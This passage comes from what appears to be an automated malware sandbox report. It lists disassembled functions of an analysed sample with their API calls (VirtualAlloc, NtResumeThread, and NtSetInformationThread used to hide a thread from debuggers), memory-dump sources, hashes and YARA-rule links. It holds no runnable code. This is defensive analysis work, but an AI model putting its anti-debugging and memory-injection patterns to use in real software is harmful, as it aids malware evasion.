Opcode Fuzzy Hash: 34bcad99d6e4df8d5f25087dca356fe843a9e0b374d8d10cbf7278d4331fccb8
Instruction Fuzzy Hash: A52133306133358EEB296A20C8687B6B695BF01325F59616DCD428B892E774C8CCC731

Uniqueness

Uniqueness Score: -1.00%

Function 02328A00, Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: Thread$InformationResume
String ID:
API String ID: 1221416862-0
Opcode ID: a70a949dbbd3505bf15315f72e4718b3b42365535410290888c5fa420ecdb370
Instruction ID: 225fbedb4e00008e7814d19835664e3c6d72cebff1a81494902c393f68bdb228
Opcode Fuzzy Hash: a70a949dbbd3505bf15315f72e4718b3b42365535410290888c5fa420ecdb370
Instruction Fuzzy Hash: 1D210A306173358EEB396E24C4547A677A5BF02325F59655DC8458B892F774C8CCC731

Uniqueness

Uniqueness Score: -1.00%

Function 00406497, Relevance: 1.6, APIs: 1, Instructions: 331memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: da6237286c5c0ce3c4b54f0ae5881c26850de7a4c7606579672cc264cc5c9c32
Instruction ID: 1fc2d06d8a4b7c8106cd44117689125fcb0185fe3dee5e838347ce15a758f504
Opcode Fuzzy Hash: da6237286c5c0ce3c4b54f0ae5881c26850de7a4c7606579672cc264cc5c9c32
Instruction Fuzzy Hash: 20A129B2F4E101CBE3644A50E840B317A31AB43304FB265BB99073A5D6D77D6963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004064AC, Relevance: 1.6, APIs: 1, Instructions: 328memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 800c4d7c23120c1e0074c2eac8cbee870c929b4d0b08f7a14f24e9287d0f27cb
Instruction ID: 6c74adba832fb60d1fe120b4962f17c3355570c3eb2e35e2f9fb625a0cf8be60
Opcode Fuzzy Hash: 800c4d7c23120c1e0074c2eac8cbee870c929b4d0b08f7a14f24e9287d0f27cb
Instruction Fuzzy Hash: 91A138B2F4E101CBE3644A10E840B307A31AB43304FB265BB99073A5D6D77D6963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004068A9, Relevance: 1.6, APIs: 1, Instructions: 327memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e3e7e55455e22588caa8463b7cfaeef14aab05679de762128e60228880b224f2
Instruction ID: 9086eec3ea47e70f3a793436030b5f831af2c0c4fb9d8f6a436a019ea5c40ed1
Opcode Fuzzy Hash: e3e7e55455e22588caa8463b7cfaeef14aab05679de762128e60228880b224f2
Instruction Fuzzy Hash: 0B8104B2F4E101CBE3604A54E880B307A31AB43344FB265BB99077A5D2D77C6953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004065E1, Relevance: 1.6, APIs: 1, Instructions: 327memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c299ce0aab56386928cd0d2681cf49bcc6e87b81bb752fde5733967c64d22475
Instruction ID: d9ca096de5b77a093509b05394fc1bf4b3e315616b8af72ecde22e1ddec35806
Opcode Fuzzy Hash: c299ce0aab56386928cd0d2681cf49bcc6e87b81bb752fde5733967c64d22475
Instruction Fuzzy Hash: 20913AB2F4E101CBE3644A50E840B307A31AB43304FB265BB89077A5D2D77D6963BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 023208D3, Relevance: 1.6, APIs: 1, Instructions: 71nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 72e69807a729313c7c84b081ab3a44a18252f1b2201ad95a0e3f511f4bafb1a6
Instruction ID: 1ccc8dd367505cf0862749b738e1dd2b92cfae63c2d2874b2370eb03abb51059
Opcode Fuzzy Hash: 72e69807a729313c7c84b081ab3a44a18252f1b2201ad95a0e3f511f4bafb1a6
Instruction Fuzzy Hash: 1D1138756003349FEF24FEB88CC479E37B69F68764F64052AE99697581C720C4CDCA42

Uniqueness

Uniqueness Score: -1.00%

Function 00406701, Relevance: 1.6, APIs: 1, Instructions: 320memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3080e48bcc495cf074d4a8e7d3ca9055e6978a002bdc56468628a9b0a0a4c310
Instruction ID: 02190fab701f7e2028cb32b35d24226c5750c34faea6eb7613a66ad19947a16a
Opcode Fuzzy Hash: 3080e48bcc495cf074d4a8e7d3ca9055e6978a002bdc56468628a9b0a0a4c310
Instruction Fuzzy Hash: 769139B2F4E101CBE3204A50E880B307A31AB43344FB265BB99077A5D2D77C6953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00406548, Relevance: 1.6, APIs: 1, Instructions: 317memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 52d590ebde4a7fce9b3fe8e464db6a5c871df3487f018df03c89a1733d36575a
Instruction ID: 2d408daa6a91d85e58bffeb3e418fed8b8ebd0da74281c69677b900b04123766
Opcode Fuzzy Hash: 52d590ebde4a7fce9b3fe8e464db6a5c871df3487f018df03c89a1733d36575a
Instruction Fuzzy Hash: BAA127B2F4E101CBE3644A50E840B317A31AB43304FB265BB99073A5D2D77D6963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004066E3, Relevance: 1.6, APIs: 1, Instructions: 316memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a00a5041d2d7e4affbae82e93658856e7ae7b44cac45dd8a6f459b62229df593
Instruction ID: 6755cf2b271b899dd867a9f22e54bc0212aa9a506b6428fcd40ce5e95bfa3db7
Opcode Fuzzy Hash: a00a5041d2d7e4affbae82e93658856e7ae7b44cac45dd8a6f459b62229df593
Instruction Fuzzy Hash: D09128B2F4E101CBE3204A54E840B307A31AB43344FB265BB99077A5D2D77C6963BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00406555, Relevance: 1.6, APIs: 1, Instructions: 314memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4197333226b80bd62adcb3d4314f4a752514d8a2568e5494e80ba3d2582c1272
Instruction ID: 68a7dca19e86ee7318a2888b57ec9cebd254f59adaeece0f3efc19eb8ccf399b
Opcode Fuzzy Hash: 4197333226b80bd62adcb3d4314f4a752514d8a2568e5494e80ba3d2582c1272
Instruction Fuzzy Hash: 87A13AB2F4E111CBE3644A50E840B307A31AB43304FB265BB89077A5D2D77D6963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 00406627, Relevance: 1.6, APIs: 1, Instructions: 314memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5c165e3993ed8629fc21331e00fa55c21c77cd802ef564b85985adfd9149d3b0
Instruction ID: 202b319c2296645df306d76223d6f172cc0aae2ad63287c74a58399dabc578aa
Opcode Fuzzy Hash: 5c165e3993ed8629fc21331e00fa55c21c77cd802ef564b85985adfd9149d3b0
Instruction Fuzzy Hash: DC913AB2F4E101CBE3204A54E840B307631AB43304FB265BB89077A5D2D77D6863BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004065FB, Relevance: 1.6, APIs: 1, Instructions: 310memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0f75f24d1b27f1d69e0cd2cb66dc6df4a61bcce8ac9f5dfb9a8228ef4a9d59dd
Instruction ID: 9165438a18e271fa5006a5bc7e927136f01e773792f10434666483c4013cd179
Opcode Fuzzy Hash: 0f75f24d1b27f1d69e0cd2cb66dc6df4a61bcce8ac9f5dfb9a8228ef4a9d59dd
Instruction Fuzzy Hash: 219139B2F4E501CBE3604A50E840B307A31AB43304FB265BB99077A5D2D77D6963BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040676F, Relevance: 1.6, APIs: 1, Instructions: 305memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5244cc3ae0f8028d38416868739ed14251c9cc7487f93a2148dad1f70d4e6a50
Instruction ID: 8b02261d756506f599cd8c1cab5081e08592caf96dc1ae7d296fc0ba74d70822
Opcode Fuzzy Hash: 5244cc3ae0f8028d38416868739ed14251c9cc7487f93a2148dad1f70d4e6a50
Instruction Fuzzy Hash: 679127B2F4E101CBE3204A54E880B307A31AB43344FB265BB99077A5D2D77C6953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004067E6, Relevance: 1.6, APIs: 1, Instructions: 304memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 43c03a7c37b62c9568e3197f64f1c2ed1122680be78c5b05d2e407953d6bc48c
Instruction ID: 1c7cdc9b934b08d5139e7db53fcb4f3082ddfa114c487f50db3d11fe41fcfc7c
Opcode Fuzzy Hash: 43c03a7c37b62c9568e3197f64f1c2ed1122680be78c5b05d2e407953d6bc48c
Instruction Fuzzy Hash: D09135B2F4E101CBE3204A54E880B307A31AB43344FB265BB89077A5D2D77C6913BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 02328B78, Relevance: 1.6, APIs: 1, Instructions: 52nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d3563366a4586dc5dedc66c515dae9fa24374231f45c9b41b9ccbd8cb67e4a1b
Instruction ID: 1613e884e5fd49f120771c4009b771010459be6c432d53a12cb81eedae766069
Opcode Fuzzy Hash: d3563366a4586dc5dedc66c515dae9fa24374231f45c9b41b9ccbd8cb67e4a1b
Instruction Fuzzy Hash: EF11F5306133348DEB28AE24D058763B3A5BF01319F5A756DC9458B861F730C8CCC721

Uniqueness

Uniqueness Score: -1.00%

Function 02328BA6, Relevance: 1.6, APIs: 1, Instructions: 52nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f4bcfcc463c248b55c4d6e4c36f6f63eb6347aeddad843e00011d81fb0fd1949
Instruction ID: 1c7100ed65ceec986d16cda06b80f0ffa2e21ffea2c98345f4935339da0de48b
Opcode Fuzzy Hash: f4bcfcc463c248b55c4d6e4c36f6f63eb6347aeddad843e00011d81fb0fd1949
Instruction Fuzzy Hash: E51192306133358DEB386E24D1583A7B3A5BF01329F99B569C9858B861F771C8CCC721

Uniqueness

Uniqueness Score: -1.00%

Function 00406AF5, Relevance: 1.5, APIs: 1, Instructions: 299memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5985139a5874c8436da5c213cbb5598b6b4a179b3da90a583dbc0598b052ff54
Instruction ID: 66c5a3eef1075ae583f102c534a2e8b5a711c590142409b8c07264b68e81e183
Opcode Fuzzy Hash: 5985139a5874c8436da5c213cbb5598b6b4a179b3da90a583dbc0598b052ff54
Instruction Fuzzy Hash: 7B71F5B2F4E102CBE3204A50A880B307631AB53344FB265BB89077A5D2D77C7953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004068FE, Relevance: 1.5, APIs: 1, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0e0525271454e5e9d1fa4fa7caa2b674e6494f943d1eb015286abcdd8382b9aa
Instruction ID: e498370a08a9d9d76e3c50e54daa53e044d8bed5f6fbd879106d72e640d86576
Opcode Fuzzy Hash: 0e0525271454e5e9d1fa4fa7caa2b674e6494f943d1eb015286abcdd8382b9aa
Instruction Fuzzy Hash: D58105B2F4E101CBE3604A50A880B307A31AB43344FB265BB99077A5D2D77C6953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004069C6, Relevance: 1.5, APIs: 1, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 742dfb86744249a7e1e7650cf532d96eedf8104d740e394861de8032c6f5b32e
Instruction ID: 60fed7209b362e0e8dcaae5fe80cb158766e0bc7404a856fcc858a7d86419dd8
Opcode Fuzzy Hash: 742dfb86744249a7e1e7650cf532d96eedf8104d740e394861de8032c6f5b32e
Instruction Fuzzy Hash: 7A71F5B2F4E101CBE3204A54A880B307631AB53344FB265BB99077A5D2D77C7953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00406C09, Relevance: 1.5, APIs: 1, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fa11fa1be23dccc9aa6e579e39a98221b8c495ff9575d977362fc22b50735ce0
Instruction ID: 91465befaaebe6deadc1a760d4fadfbbd3ba9a8f5111643eaf063de36c2c0f8c
Opcode Fuzzy Hash: fa11fa1be23dccc9aa6e579e39a98221b8c495ff9575d977362fc22b50735ce0
Instruction Fuzzy Hash: EF61E5B2F4E102CBE3244A50A880B307531AB53344FB265BB89073A5D6D77C7953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004067D9, Relevance: 1.5, APIs: 1, Instructions: 285memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a6515a9939929c40ba7a6d189391ddc610053821286142d790655e3895cb6a87
Instruction ID: 61d193c467718a340780166c2d917b0ff59f9a85bace612139cf7cc686234519
Opcode Fuzzy Hash: a6515a9939929c40ba7a6d189391ddc610053821286142d790655e3895cb6a87
Instruction Fuzzy Hash: 289137B2F4E101CBE3604A50E880B307A31AB47344FB265BB89077A5D2D77C6953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00406D22, Relevance: 1.5, APIs: 1, Instructions: 279memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 29f5f5645f1e423c436485bd130361a48dcb16abc374837453f207bc913ea935
Instruction ID: 16f4dee7d5f068d82a9049d6c36fdbc112f69117377e51b2ea2190c05dd135f5
Opcode Fuzzy Hash: 29f5f5645f1e423c436485bd130361a48dcb16abc374837453f207bc913ea935
Instruction Fuzzy Hash: 7451E6B2F4E101CBE3644A50A880B307631AB53344FB265BB89073A5D6D67C7943BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004069F3, Relevance: 1.5, APIs: 1, Instructions: 279memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e608be6d57198b328d4dacdf8f6fbdc720d029d3874cabd4ce484eb19f992f6e
Instruction ID: 60ccfef112d4dc9fb0e74d3787f1b8a144a293cf7c2bac38bcb3cc1cfe2ed7d3
Opcode Fuzzy Hash: e608be6d57198b328d4dacdf8f6fbdc720d029d3874cabd4ce484eb19f992f6e
Instruction Fuzzy Hash: C071F5B2F4E102CBE3204A54A880B307631AB53344FB265BB99077A5D2D77C7953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00406A18, Relevance: 1.5, APIs: 1, Instructions: 279memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d1858383d8f6c5352bff27d257bf929a12f3f9586626c7515b4e7f0cdea266b
Instruction ID: 5ef87a52ed9286e11c3e34e323ec8fea82ff88c2e350ba70a06ce4f3bf2a04c9
Opcode Fuzzy Hash: 5d1858383d8f6c5352bff27d257bf929a12f3f9586626c7515b4e7f0cdea266b
Instruction Fuzzy Hash: F971F4B2F4E102CBE3204A50A880B307631AB53344FB265BB99073A5D2D77C7953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 02328C48, Relevance: 1.5, APIs: 1, Instructions: 28nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5b496790c8193ab51c035f5d66d01b28a1a27aa6bbe9880ac4f207b836340879
Instruction ID: acaa81e0fc8dae819186e009620dca175ea94591eb8b9b31dd7ed45ce5c18e07
Opcode Fuzzy Hash: 5b496790c8193ab51c035f5d66d01b28a1a27aa6bbe9880ac4f207b836340879
Instruction Fuzzy Hash: 80E092343537768D9B2DBE38D4A43B6B763AD5360839C569DC981CB564F732888CC321

Uniqueness

Uniqueness Score: -1.00%

Function 00406A3E, Relevance: 1.5, APIs: 1, Instructions: 278memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5c8a5d023bd2e352f622fe845f9ade6417b2b01b253b719660d3568b5ac31cd6
Instruction ID: 16d492801367bcbf429989a20d61d5b1d0f55c1e0402c9ca64909d71f4f550e5
Opcode Fuzzy Hash: 5c8a5d023bd2e352f622fe845f9ade6417b2b01b253b719660d3568b5ac31cd6
Instruction Fuzzy Hash: E47105B2F4E102CBE3204A50A880B307631AB53344FB265BB99077A5D2D77C7953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00406C4F, Relevance: 1.5, APIs: 1, Instructions: 277memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8fab96d349ea269b19770b313ff259c66b277700576f5e925c77f0a17eaaaa50
Instruction ID: 57a4e680c2ff6cbb825601bce230ee8a581c61ad1c0915bc90f1d76714acb46e
Opcode Fuzzy Hash: 8fab96d349ea269b19770b313ff259c66b277700576f5e925c77f0a17eaaaa50
Instruction Fuzzy Hash: 7661E5B2F4E102CBE3244A50A880B307531AB53344FB265BB89073A5D6D77C7953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00406A6C, Relevance: 1.5, APIs: 1, Instructions: 269memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

